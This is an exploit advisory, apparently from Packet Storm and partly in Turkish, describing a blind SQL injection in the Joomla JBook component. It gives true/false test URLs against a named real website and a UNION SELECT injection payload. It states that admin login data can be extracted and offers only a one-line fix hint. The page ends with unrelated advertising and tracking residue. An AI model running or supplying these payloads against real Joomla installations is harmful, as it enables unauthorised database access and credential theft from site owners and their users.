The Joomla JBook component suffers from a remote blind SQL injection vulnerability.
82a3803141bef4e8ead842e7e26ad61e6ed73d6d6b1f6d11eb86d402b1d9d38a
<------------------- header data start ------------------- >
#############################################################
# Joomla Component com_jbook Blind SQL-injection Vulnerability #
#############################################################
# author : Fl0riX
# Greetz : BARCOD3 , Septemb0x, Deep-Power,DreamPower,Pyske,F0rtys3v3n,BlackApple
# Name : com_jbook
# Bug Type : Blind SQL Injection
# Infection : Admin login bilgileri alýnabilir.
# Demo Vuln. :
TRUE(+)
» http://www.wglasser.com/index.php?option=com_jbook&Itemid=90 and 1=1
FALSE(-)
» http://www.wglasser.com/index.php?option=com_jbook&Itemid=90 and 1=0
# Bug Fix Advice : Zararlý karakterler filtrelenmelidir.
# Greez : KinqSqlZ Crew
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
path/index.php?option=com_jbook&Itemid=null/**/and/**/1=0/**/union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
< -- bug code end of -- >
_________________________________________________________________
Yeni Windows 7: Gündelik iþlerinizi basitleþtirin. Size en uygun bilgisayarý bulun.
http://windows.microsoft.com/shop
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed